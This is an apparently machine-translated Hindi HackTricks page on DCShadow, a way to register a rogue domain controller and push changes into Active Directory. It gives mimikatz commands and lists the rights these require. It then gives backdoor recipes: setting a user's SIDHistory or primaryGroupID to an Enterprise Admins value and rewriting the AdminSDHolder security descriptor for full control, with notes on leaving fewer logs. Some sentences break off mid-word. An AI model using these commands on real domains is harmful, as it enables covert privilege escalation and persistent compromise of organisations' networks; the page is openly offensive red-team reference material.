DCShadow

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान देखें!
आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
अपने हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।

DCShadow

यह AD में एक नया डोमेन कंट्रोलर रजिस्टर करता है और इसका उपयोग करके निर्दिष्ट ऑब्ज

!+
!processtoken
lsadump::dcshadow /object:username /attribute:Description /value="My new description"

mimikatz2 (push) - DA या समान की आवश्यकता है

lsadump::dcshadow /push

सूचित करें कि elevate::token mimikatz1 सत्र में काम नहीं करेगा क्योंकि यह धागे की विशेषाधिकारों को उच्च करता है, लेकिन हमें प्रक्रिया की विशेषाधिकार को उच्च करने की आवश्यकता है। आप एक "LDAP" वस्तु को भी चुन सकते हैं: /object:CN=Administrator,CN=Users,DC=JEFFLAB,DC=local

आप DA से या इस न्यूनतम अनुमतियों वाले उपयोगकर्ता से इस तरह से परिवर्तनों को पुश कर सकते हैं:

डोमेन वस्तु में:
DS-Install-Replica (डोमेन में रेप्लिका जोड़ें/हटाएं)
DS-Replication-Manage-Topology (रेप्लिकेशन टोपोलॉजी प्रबंधित करें)
DS-Replication-Synchronize (रेप्लिकेशन समकालीनता)
साइट्स वस्तु (और इसके बच्चे) कॉन्फ़िगरेशन कंटेनर में:
CreateChild और DeleteChild
कंप्यूटर वस्तु की वस्तु (जो एक DC के रूप में पंजीकृत है):
WriteProperty (लेखन नहीं)
लक्ष्य वस्तु:
WriteProperty (लेखन नहीं)

आप Set-DCShadowPermissions का उपयोग करके इन अनुमतियों को एक अनुप्रयोगी उपयोगकर्ता को दे सकते हैं (ध्यान दें कि इससे कुछ लॉग छोड़ जाएंगे)। यह DA अनुमतियों रखने से कहीं अधिक प्रतिबंधक है। उदाहरण के लिए: Set-DCShadowPermissions -FakeDC mcorp-student1 SAMAccountName root1user -Username student1 -Verbose इसका मतलब है कि जब यूजरनेम student1 मशीन mcorp-student1 में लॉग ऑन होता है तो उसके पास DCShadow अनुमतियाँ root1user वस्तु पर होती हैं।

DCShadow का उपयोग बैकडोर बनाने के लिए

lsadump::dcshadow /object:student1 /attribute:SIDHistory /value:S-1-521-280534878-1496970234-700767426-519

प्राथमिक समूह आईडी बदलें (उपयोगकर्ता को डोमेन प्रशासकों के सदस्य के रूप में डालें)

lsadump::dcshadow /object:student1 /attribute:primaryGroupID /value:519

AdminSDHolder के ntSecurityDescriptor को संशोधित करें (किसी उपयोगकर्ता को पूर्ण नियंत्रण दें)

#First, get the ACE of an admin already in the Security Descriptor of AdminSDHolder: SY, BA, DA or -519
(New-Object System.DirectoryServices.DirectoryEntry("LDAP://CN=Admin SDHolder,CN=System,DC=moneycorp,DC=local")).psbase.Objec tSecurity.sddl
#Second, add to the ACE permissions to your user and push it using DCShadow
lsadump::dcshadow /object:CN=AdminSDHolder,CN=System,DC=moneycorp,DC=local /attribute:ntSecurityDescriptor /value:<whole modified ACL>

शैडोसेप्शन - DCShadow का उपयोग करके DCShadow अनुमतियाँ देना (संशोधित अनुमतियों के लॉग नहीं)

हमें निम्नलिखित ACEs को हमारे उपयोगकर्ता के SID के साथ जोड़ना होगा:

डोमेन ऑब्ज

PreviousCustom SSP NextDCSync

Last updated 3 months ago